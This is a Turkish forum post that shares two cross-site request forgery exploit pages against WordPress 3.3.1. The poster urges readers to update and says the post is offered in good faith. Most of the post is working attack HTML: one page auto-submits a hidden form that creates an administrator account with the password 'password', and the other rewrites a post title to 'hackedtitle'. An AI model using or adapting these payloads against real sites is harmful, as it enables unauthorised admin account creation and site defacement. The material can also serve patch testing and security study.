Forum
Aktif konular
Üyeler
Kurallar
Arama
Wordpress 3.3.1 Multiple CSRF Açıkları Wordpress 3.3.1 Multiple CSRF Açıkları
-
Arkaşlar Eğer Güncellemeyen varsa güncel sürüm 3.3.2 sürümüne 3.3.1 sürümünde CSRF(cross site request forget) Açıkları mevcutmuş ben çok fazla denenedim bu açığı dendiklerimde de işe yaramadı ı ama buyrun incelleyin exploit leri vereyim size inceleyin açıkalrınız vs kapatırsınız artık iyiy niyetle yaklaşıyorum :)
Arkaşlar Eğer Güncellemeyen varsa güncel sürüm 3.3.2 sürümüne 3.3.1 sürümünde CSRF(cross site request forget) Açıkları mevcutmuş ben çok fazla denenedim bu açığı dendiklerimde de işe yaramadı ı ama buyrun incelleyin exploit leri vereyim size inceleyin açıkalrınız vs kapatırsınız artık iyiy niyetle yaklaşıyorum :)
1. Admin oluşturmak için exploit siteye ve kendinize göre düzenlersiniz 3.3.2 de de işe yarıyormuş bu güya
01 <html>
02 <body onload="javascript:document.forms[0].submit()">
03 <H2>CSRF Exploit to add Administrator</H2>
04 <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
05 <input type="hidden" name="action" value="createuser"/>
06 <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
07 <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
08 <input type="hidden" name="user_login" value="admin2"/>
09 <input type="hidden" name="email" value="admin2@admin.com"/>
10 <input type="hidden" name="first_name" value="admin2@admin.com"/>
11 <input type="hidden" name="last_name" value=""/>
12 <input type="hidden" name="url" value=""/>
13 <input type="hidden" name="pass1" value="password"/>
14 <input type="hidden" name="pass2" value="password"/>
15 <input type="hidden" name="role" value="administrator"/>
16 <input type="hidden" name="createuser" value="Add+New+User+"/>
17 </form>
18 </body>
19 </html>
2. Buyrun bu da Konu başlığını Düzenlemek için kullanılan exploit kendinize göre düzenlersiniz
01 <html>
02 <body onload="javascript:document.forms[0].submit()">
03 <H2>CSRF Exploit to change post title</H2>
04 <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
05 <input type="hidden" name="post_title" value="hackedtitle"/>
06 <input type="hidden" name="post_name" value="hackedtitle"/>
07 <input type="hidden" name="mm" value="03"/>
08 <input type="hidden" name="jj" value="16"/>
09 <input type="hidden" name="aa" value="2012"/>
10 <input type="hidden" name="hh" value=""/>
11 <input type="hidden" name="mn" value=""/>
12 <input type="hidden" name="ss" value=""/>
13 <input type="hidden" name="post_author" value="1"/>
14 <input type="hidden" name="post_password" value=""/>
15 <input type="hidden" name="post_category%5B%5D" value="0"/>
16 <input type="hidden" name="post_category%5B%5D" value="1"/>
17 <input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
18 <input type="hidden" name="comment_status" value="open"/>
19 <input type="hidden" name="ping_status" value="open"/>
20 <input type="hidden" name="_status" value="publish"/>
21 <input type="hidden" name="post_format" value="0"/>
22 <input type="hidden" name="_inline_edit" value="<sniffed_value>"/>
23 <input type="hidden" name="post_view" value="list"/>
24 <input type="hidden" name="screen" value="edit-post"/>
25 <input type="hidden" name="action" value="inline-save"/>
26 <input type="hidden" name="post_type" value="post"/>
27 <input type="hidden" name="post_ID" value="1"/>
28 <input type="hidden" name="edit_date" value="true"/>
29 <input type="hidden" name="post_status" value="all"/>
30 </form>
31 </body>
32 </html>
1 Konunun Kaynağı: http://www.webapp-security.com/wp-content/uploads/2012/04/Wordpress-3.3.1-Multiple-CSRF-Vulnerabilities7.txt
bu editördeki highlighter sıçıyor ondan böyle ekledim
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla